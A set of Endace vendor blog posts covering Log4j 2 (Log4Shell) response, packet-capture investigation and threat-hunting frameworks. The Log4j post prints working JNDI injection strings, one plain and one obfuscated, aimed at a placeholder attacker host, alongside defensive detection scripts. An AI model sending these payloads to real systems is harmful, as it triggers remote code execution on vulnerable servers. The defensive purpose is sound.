Endace Packet Forensics Files: Episode #35

Original Entry by: Michael Morris

Michael talks to Timothy Wilson-Johnston, Value Chain Security Leader, Cisco

By Michael Morris, Director of Global Business Development, Endace


What did we learn from the recent Log4j 2 vulnerability? How are security holes like this changing the way organizations think about deploying enterprise software solutions?

In this episode of the Endace Packet Forensics Files, Michael Morris talks with Timothy Wilson-Johnston about the Log4j 2 threat and how it is being exploited in the wild.

Timothy shares his thoughts about what Log4j 2 has taught us, and why organizations need to look at the bigger picture:

  • How you can better defend against vulnerabilities of this type
  • Why it’s so important to closely scrutinize solutions that are deployed – and make sure you have visibility into components that might be included with those solutions

Finally, Timothy discusses the importance of weighing security against functionality, and why it is critical to have software inspection and validation processes in place to manage third-party risk to your business. Knowing what your vendors’ standards are, and implementing a structured and repeatable process for evaluating vendors and solutions, is key to improving security maturity.


Other episodes in the Secure Networks video/audio podcast series are available here.


Log4j 2: A Week’s Look Back

Original Entry by: Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace



Many organizations have been scrambling this week to search their networks for instances of any use of Log4j 2 libraries and quickly patch applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors trying to determine if their systems or applications are potentially impacted and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat? The Apache Log4j 2 Java library contains a remote code execution vulnerability (CVE-2021-44228), known as Log4Shell. It gives remote, unauthenticated attackers the ability to execute arbitrary code, loaded from a malicious server, with the privileges of the Log4j 2 process.
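
To make the mechanics concrete, here is a minimal illustration (written as annotated Python, purely for readability) of what the injected lookup string looks like. The domain shown is a placeholder rather than a real indicator, and the obfuscated variant is just one of many that have been documented publicly.

# Illustrative only. The classic Log4Shell payload is a JNDI lookup embedded in any
# string that ends up being logged: a User-Agent header, a username field, a chat
# message, and so on. "attacker.example.com" is a placeholder, not a real indicator.
classic_payload = "${jndi:ldap://attacker.example.com/a}"

# Attackers commonly nest lookups to evade naive string matching; this is one
# widely documented variant among many.
obfuscated_payload = "${${lower:j}ndi:${lower:l}dap://attacker.example.com/a}"

# When a vulnerable Log4j 2 instance (prior to the patched releases) logs either
# string, it resolves the JNDI lookup, contacts the attacker's LDAP server, and can
# be induced to load and execute a remote Java class with the privileges of the
# Log4j 2 process.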

The attack process is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:


Log4j 2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for seeding or running remotely executed code, which could then be used to conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams, such as Palo Alto Networks’ Unit 42, that discuss the scale and severity of the potential risks to organizations from this zero-day threat. Several key takeaways stand out.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability, there have already been several compromises and ransomware attacks. However, much of the threat actor activity so far appears to be reconnaissance and the planting of additional malware that can be used later, after threat actors have obtained initial access to a network and the systems on it.

Our technology partner, Keysight Technologies, has been tracking honeypot activity that shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere Log4j 2 is found, you need to isolate the system and investigate for any potential compromise. It’s essential to put in place policies, rules, and filter protections to monitor egress traffic to unknown IP addresses. Apply filters, and pay extra attention to common protocols like LDAP, LDAPS, RMI, and DNS, as these are key protocols being leveraged for lateral movement and reconnaissance. Look for anomalous or unexpected traffic to and from potentially compromised systems if you are unable to isolate them.
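
As a rough sketch of that kind of egress check, the following Python scans a simple connection log for outbound traffic on commonly abused callback ports to addresses outside an allowlist. The log format, filename, and allowlist ranges are assumptions made for the example, not a prescribed layout.

import csv
import ipaddress

# Ports commonly leveraged for Log4Shell callbacks and lateral movement.
WATCH_PORTS = {389: "LDAP", 636: "LDAPS", 1099: "RMI", 53: "DNS"}

# Hypothetical allowlist of networks your servers legitimately talk to.
ALLOWED_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]

def is_allowed(dst_ip: str) -> bool:
    addr = ipaddress.ip_address(dst_ip)
    return any(addr in net for net in ALLOWED_NETS)

# Assumed CSV columns: timestamp, src_ip, dst_ip, dst_port.
with open("outbound_connections.csv", newline="") as f:
    for row in csv.DictReader(f):
        port = int(row["dst_port"])
        if port in WATCH_PORTS and not is_allowed(row["dst_ip"]):
            print(f"{row['timestamp']} suspicious {WATCH_PORTS[port]} egress: "
                  f"{row['src_ip']} -> {row['dst_ip']}:{port}")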

Of course, you should also ensure your IDSs and firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may already have been done.

If you’re collecting network metadata in a SIEM such as Splunk or Elastic, the first place to start looking would be to search all HTTP transactions for strings containing JNDI calls. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html
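
If you also keep HTTP transaction data outside the SIEM (for example, as exported web server logs), a loose pattern match along the following lines will catch the plain payload and some of the commonly documented obfuscations. The regular expression and log path are assumptions for illustration; the Splunk post linked above covers the SIEM-native equivalent.

import re

# Deliberately loose: matches "${jndi:" as well as nested-lookup obfuscations such as
# "${${lower:j}ndi:". Expect false positives and tune for your environment.
JNDI_PATTERN = re.compile(r"\$\{.{0,30}j.{0,10}n.{0,10}d.{0,10}i.{0,10}:", re.IGNORECASE)

def find_jndi_lines(path):
    # Yield (line_number, line) for every log line containing a JNDI-style lookup.
    with open(path, errors="replace") as f:
        for lineno, line in enumerate(f, start=1):
            if JNDI_PATTERN.search(line):
                yield lineno, line.rstrip()

# Hypothetical access log location; point this at whatever HTTP logs you retain.
for lineno, line in find_jndi_lines("/var/log/nginx/access.log"):
    print(f"line {lineno}: {line}")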

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video on how to use Wireshark to identify and analyze a Log4j 2 attack. It’s well worth watching.

Once you have identified connections that contain the JNDI string, you can quickly examine any subsequent outgoing connections from the affected host to see if successful contact was made with the malicious LDAP server, downloading Java malware to infect your server. Knowing whether or not this step happened will save your team many days of incident response and allow them to focus on the servers that have actually been compromised.
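
If you have recorded packets, a small script along these lines can make a first pass over them: flag hosts that received a JNDI-style string, then list their subsequent outbound connection attempts on typical callback ports. It assumes Scapy is installed and uses a hypothetical pcap filename; with an EndaceProbe you would first filter and export the relevant traffic window rather than parsing an entire capture this way.

import re
from scapy.all import rdpcap, IP, TCP, Raw  # assumes "pip install scapy"

# Same loose JNDI pattern as above, in bytes form.
JNDI = re.compile(rb"\$\{.{0,30}j.{0,10}n.{0,10}d.{0,10}i.{0,10}:", re.IGNORECASE)
CALLBACK_PORTS = {389, 636, 1099}  # LDAP, LDAPS, RMI (TCP only in this sketch)

packets = rdpcap("log4shell_window.pcap")  # hypothetical exported capture

# Pass 1: hosts that received a payload-like string.
suspect_hosts = set()
for pkt in packets:
    if pkt.haslayer(Raw) and pkt.haslayer(IP) and JNDI.search(pkt[Raw].load):
        suspect_hosts.add(pkt[IP].dst)

# Pass 2: outbound connection attempts (initial SYNs) from those hosts.
for pkt in packets:
    if pkt.haslayer(TCP) and pkt.haslayer(IP) and pkt[IP].src in suspect_hosts:
        if pkt[TCP].dport in CALLBACK_PORTS and pkt[TCP].flags.S and not pkt[TCP].flags.A:
            print(f"{pkt[IP].src} -> {pkt[IP].dst}:{pkt[TCP].dport} (SYN)")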

Good luck with the Log4j 2 threat hunting! To learn more about how cost-effective and simple it can be to have an always-on network packet capture platform, integrated with the rest of your security tools, to help you search for Log4j 2 and other zero-day attacks, go to www.endace.com.


The Importance of Network Data to Threat Hunting (Part 3)

Original Entry by: Robert Salier

Frameworks and Regulations

By Robert Salier, Product Manager, Endace


In this, the third article in our series on threat hunting (see here for Part 1 and Part 2), we explore the frameworks and regulations most relevant to threat hunting.

These tend to fall into two categories: those that address cybersecurity at a governance level, and those that facilitate insight into individual attacks and help formulate appropriate defense actions.

Governance Level Frameworks and Regulations

The regulatory environment influences threat hunting, and cyber defense in general. In many countries, regulations impose obligations on disclosure of breaches, including what information must be provided, when, and to which stakeholders. This influences the information an organization needs to know about a breach, and hence its choice of strategies, policies, processes and tools. These regulations generally require companies to disclose a breach to all customers that have been affected. However, if an organization cannot ascertain which customers were affected, or even whether any customers were affected, then it may need to contact every customer. The only thing worse than having to disclose a breach is having to disclose a breach without being able to provide the details your customers expect you to know.

There are also a number of frameworks addressing cybersecurity at the governance level, which in some cases overlap with regulations, dealing with many of the same issues and considerations. Collectively, these frameworks and regulations help to ensure organizations implement good strategies, policies, processes and tools, addressing questions such as:

  • Which systems and data are most important to the organization
  • What information security policies should be in place
  • How cybersecurity should be operationalized (e.g. what organizational structure, security architecture and systems are most appropriate for the organization)
  • Incident management processes
  • Best practice guidelines

Prevalent frameworks and regulations include…

  • ISO 27000 Series of Information Security Standards
    A comprehensive family of standards for information security management, providing a set of best practices. Maintained by the International Organization for Standardization (ISO), it has been broadly adopted around the globe.
  • NIST Special Publication 800-53
    A catalogue of security and privacy controls for all U.S. federal organizations except those related to national security.
  • NIST Cybersecurity Framework
    A policy framework for private sector organizations to assess and improve their ability to prevent, detect, and respond to cyber attacks. It was developed for the USA, but has been adopted in a number of countries.

Frameworks to Characterize Attacks and Facilitate Responses

A number of frameworks have been developed to help describe and characterize attacker activity, and ultimately facilitate defense strategies and tactics.

Prevalent frameworks include…

  • Cyber Kill Chain
    Adapted by Lockheed Martin from the military “kill chain” concept for attack and defense, this framework decomposes a cyber attack into seven generic stages, providing a structure for characterizing and responding to attacks. Refer to this Dark Reading article for some discussion of the benefits and limitations of this framework.
  • Diamond Model
    This model describes attacks by decomposing each attack into four key aspects: the adversary, their capabilities, the infrastructure they used, and the victim(s). Multiple attack diamonds can be plotted graphically in various ways, including timelines and groupings, facilitating deeper insight.
  • MITRE ATT&CK
    Developed by MITRE, ATT&CK stands for “Adversarial Tactics, Techniques, and Common Knowledge”. It is essentially a living, growing knowledge base capturing intelligence gained from millions of attacks on enterprise networks. It consists of a framework that decomposes a cyber attack into eleven different phases, a list of techniques used in each phase by adversaries, documented real-world use of each technique, and a list of known threat actor groups. ATT&CK is becoming increasingly popular, and is used and contributed to by many security vendors and consultants.
  • OODA Loop
    Describes a process cycle of “Observe – Orient – Decide – Act”. Originally developed for military combat operations, it is now being applied to commercial operations.

The Importance of Network Data to Threat Hunting (Part 2)

Original Entry by: Robert Salier

Threat Hunting in Practice

By Robert Salier, Product Manager, Endace


Hunting for security threats involves looking for traces of attackers in an organization’s IT environment, both past and present. It involves creativity, combined with (relatively loose) methodologies and frameworks, focused on outsmarting an attacker.

Threat hunting relies on a deep knowledge of the Tactics, Techniques and Procedures (TTPs) that adversaries use, and a thorough knowledge of the organization’s IT environment. Well-executed threat hunts provide organizations with deeper insight into their IT environment and into where attackers might hide.

This, the second article in our series of blog posts on threat hunting (read Part 1 here), looks at how leading organizations approach threat hunting, and the various data, resources, systems, and processes required to threat hunt effectively and efficiently.

Larger organizations tend to have higher public profiles, more valuable information assets, and complex and distributed environments that present a greater number of opportunities for criminals to infiltrate, hide, and perform reconnaissance without detection. When it comes to seeking out best practice, it’s not surprising that large organizations are the place to look.

Large organizations recognize that criminals are constantly looking for ways to break in undetected, and that it is only a matter of time before they succeed, if they haven’t already. While organizations of all sizes are being attacked, larger organizations are the leaders in this proactive approach to hunting down intruders, i.e. “threat hunting”. They have recognized that active threat hunting increases detection rates compared with relying on incident detection alone – i.e. waiting for alerts from automated intrusion detection systems that may never come.

Best practice involves formulating a hypothesis about what may be occurring, then seeking to confirm it. Hypotheses generally fall into categories such as:

  • Driven by threat intelligence from industry news, reports, and feeds.
    e.g. newsfeeds report a dramatic increase in occurrences of a specific ransomware variant targeting your industry. So a threat hunt is initiated with the hypothesis that your organization is being targeted with this ransomware
  • Driven by situational awareness, i.e. focus on infrastructure, assets and data most important to the organization.
    e.g. a hypothesis that your customers’ records are the “crown jewels”, so hackers will be trying to gain access to exfiltrate this data

Having developed a hypothesis as a starting point, leading organizations rely on a range of tools and resources to threat hunt efficiently and effectively:

Historic Data from Hardware, Software and the Network
  • Infrastructure Logs from the individual components of hardware and software that form your IT environment, e.g. firewalls, IDS, switches, routers, databases, and endpoints. These logs capture notable events, alarms, and other useful information which, when pieced together, can provide valuable insight into historic activity in your environment. They’re like the study notes you take from a textbook: highly useful, but not a full record, just a summary of what is considered notable. Also, be wary that hackers often delete or modify logs to remove evidence of their malicious activity.
  • Summarized network data (a.k.a. “packet metadata” or “network telemetry”). Traffic on network links can be captured and analyzed in real time to generate a feed of summary information characterizing the network activity. The information that can be obtained goes well beyond the flow summaries that NetFlow provides, e.g. by identifying and summarizing activity and anomalies up to and including Layer 7, such as email header information and expired certificates. This metadata can be very useful in hunts and investigations, particularly for correlating network traffic with events and activity from infrastructure logs and users (see the sketch after this list). Also, unlike logs, packet metadata cannot be easily deleted or modified.
  • Packet-level network history. By capturing and storing packets from a network link, you have a verbatim copy of the communication over that link, allowing you to see precisely what was sent and received, with zero loss of fidelity. Some equipment, such as firewalls and IDSs, captures small samples of packets, but these capture just a fraction of a second of communications and therefore must be automatically triggered by a specific alarm or event. Capturing and storing all packets (“full packet capture” or “100% packet capture”) is the only way to obtain a complete history of all communications. Historically, the barriers to full packet capture have been the cost of the required storage and the challenge of locating the packets of interest, given the sheer volume of data. However, recent advances in technology are now breaking down those barriers.
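
The summarized network data bullet above describes rolling raw traffic up into compact records; the sketch below shows the idea in miniature, reducing a packet capture to per-flow metadata (endpoints, ports, packet and byte counts). It assumes Scapy is installed and uses a hypothetical pcap filename; commercial metadata generators extract far richer Layer-7 attributes than this.

from collections import defaultdict
from scapy.all import rdpcap, IP, TCP, UDP  # assumes "pip install scapy"

flows = defaultdict(lambda: {"packets": 0, "bytes": 0})

for pkt in rdpcap("sample_traffic.pcap"):  # hypothetical capture file
    if not pkt.haslayer(IP):
        continue
    l4 = TCP if pkt.haslayer(TCP) else UDP if pkt.haslayer(UDP) else None
    if l4 is None:
        continue
    key = (pkt[IP].src, pkt[l4].sport, pkt[IP].dst, pkt[l4].dport, l4.__name__)
    flows[key]["packets"] += 1
    flows[key]["bytes"] += len(pkt)

# Each record is a tiny piece of "network metadata": far smaller than the packets
# themselves, but enough to spot unexpected peers, ports and volumes during a hunt.
for (src, sport, dst, dport, proto), stats in sorted(flows.items()):
    print(f"{proto} {src}:{sport} -> {dst}:{dport}  "
          f"{stats['packets']} pkts / {stats['bytes']} bytes")
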
Baselines

Baselines are an understanding of what is normal and what is anomalous. Threat hunting involves examining user, endpoint, and network activity, searching for IoAs (Indicators of Attack) and IoCs (Indicators of Compromise) – i.e. “clues” pointing to possible intrusions and malicious activity. The challenge is knowing which activity is normal and which is anomalous. Without knowing that, in many cases you will not know whether certain activity is to be expected in your environment, or whether it should be investigated.
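
As a deliberately simple illustration of how a baseline turns into an anomaly flag, the sketch below compares today’s outbound byte count per host against the mean and standard deviation of a short, invented history. Real baselining covers many more metrics, longer windows, and seasonality, but the principle is the same.

from statistics import mean, stdev

# Hypothetical baseline: recent daily outbound byte counts per host (invented numbers).
baseline = {
    "10.1.2.15": [1.2e9, 0.9e9, 1.1e9, 1.3e9, 1.0e9, 1.2e9, 1.1e9],
    "10.1.2.44": [2.0e8, 2.2e8, 1.9e8, 2.1e8, 2.0e8, 2.3e8, 2.1e8],
}

# Today's observations, also invented: the second host has sent several times its norm.
today = {"10.1.2.15": 1.15e9, "10.1.2.44": 9.8e8}

for host, history in baseline.items():
    mu, sigma = mean(history), stdev(history)
    z = (today[host] - mu) / sigma if sigma else 0.0
    status = "ANOMALOUS - investigate" if abs(z) > 3 else "normal"
    print(f"{host}: {today[host]:.2e} bytes today, z-score {z:+.1f} ({status})")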

A Centralized Location for Logs and Metadata

Because there are so many disparate sources of logs, centralized collection and storage is a practical necessity for organizations with substantial IT infrastructure. Most organizations use a SIEM (Security Information and Event Manager), which may have a dedicated database for storage of logs and metadata, or may use an enterprise data lake. SIEMs can correlate data from multiple sources, support rule-based triggers, and may feature machine learning algorithms able to learn what activity is normal (i.e. “baselining”). Having learned what is normal, they can then identify and flag anomalous activity.

Threat Intelligence

Threat intelligence is knowledge that helps organizations protect themselves against cyber attacks. It encompasses both business-level and technical-level detail. At a business level, this includes general trends in malicious activity, individual breaches that have occurred, and how organizations are succeeding and failing to protect themselves. At a technical level, threat intelligence provides very detailed information on how individual threats work, informing organizations how to detect, block, and remove these threats. Generally, this comes in the form of articles intended for consumption by humans, but it also encompasses machine-readable intelligence that can be directly ingested by automated systems, e.g. updates to threat detection rules.

Frameworks and Regulations

The regulatory environment influences threat hunting, and cyber defense in general. In many countries, regulations impose obligations on disclosure of breaches, including what information must be provided, when, and to which stakeholders. There are also a number of frameworks addressing cybersecurity at the governance level, which in some cases overlap with regulations, dealing with many of the same issues and considerations. Collectively, these frameworks and regulations help to ensure organizations implement good strategies, policies, processes and tools.

In the next article in this series, we explore the frameworks and regulations that apply to threat hunting, and which ensure organizations implement appropriate strategies, policies, processes and tools.


The Importance of Network Data to Threat Hunting (Part 1)

Original Entry by: Robert Salier

Introduction to Threat Hunting

By Robert Salier, Product Manager, Endace


Criminal hackers are stealthy. They put huge effort into infiltrating without triggering intrusion detection systems or leaving traces in logs and metadata … and often succeed. So you need to actively go searching for them. That’s why SecOps teams are increasingly embracing threat hunting.

This is the first in a series of blog articles in which we discuss various aspects of threat hunting, and how visibility into network traffic can increase the efficiency and effectiveness of threat hunting. This visibility is often the difference between detecting an intruder or not, and between collecting the conclusive evidence you need to respond to an attack or not.

In December 2015, Ukraine suffered a power grid cyber attack that disrupted power distribution to the nation’s citizens. Thirty substations were switched off and damaged, leaving 230,000 people without power.

This attack was meticulously planned and executed, with the attackers having first gained access over six months before they finally triggered the outage. There were many stages of intrusion and attack, leaving traces that were only identified in subsequent investigations. Well-planned and executed threat hunting would probably have uncovered this intruder activity and averted the serious outages that took place.

This is a good example of why, in the last few years, threat hunting has been gaining substantial momentum and focus amongst SecOps teams, with increasing efforts to better define and formalize it as a discipline. You’ll see a range of definitions with slightly different perspectives, but the following captures the essence of Threat Hunting:

The process of proactively and iteratively searching through IT infrastructure to detect and isolate advanced threats that evade existing security solutions.

There’s also some divergence in approaches to threat hunting, and in the aspects that individual organizations consider most important, but key themes are:

  • To augment automated detection, increasing the likelihood that threats will be detected.
  • To provide insight into attackers’ Tactics, Techniques and Procedures (TTPs) and hence inform an organization of where it should focus its resources and attention.
  • To identify if, and where, automated systems need updating – e.g. with new triggers.

So, threat hunting involves proactively seeking out attacks on your IT infrastructure that are not detected by automated systems such as Intrusion Detection Systems (IDSs), firewalls, Data Leakage Prevention (DLP) and Endpoint Detection and Response (EDR) solutions. It’s distinct from incident response, which is reactive. It may, however, result in an incident response being triggered.

Although threat hunting can be assisted by machine-based tools, it is fundamentally an activity performed by people, not machines, heavily leveraging human intelligence, wisdom and experience.

In the next article, we explore how leading organizations approach threat hunting, and the various data, resources, systems, and processes required to threat hunt effectively and efficiently.

In the meantime, feel free to browse the Useful References page in our Threat Hunting section on endace.com, which contains both a glossary and useful links to various pages related to threat hunting. Below are some additional useful references.

References

(1) Threat Hunting Report (Cyber Security Insiders), p22

(2) 2018 Threat Hunting Survey Results (SANS), p13

(3) 2018 Threat Hunting Survey Results (SANS), p5

(4) Improving the Effectiveness of the Security Operations Center (Ponemon Institute), p10

(5) The Ultimate Guide To Threat Hunting, InfoSec Institute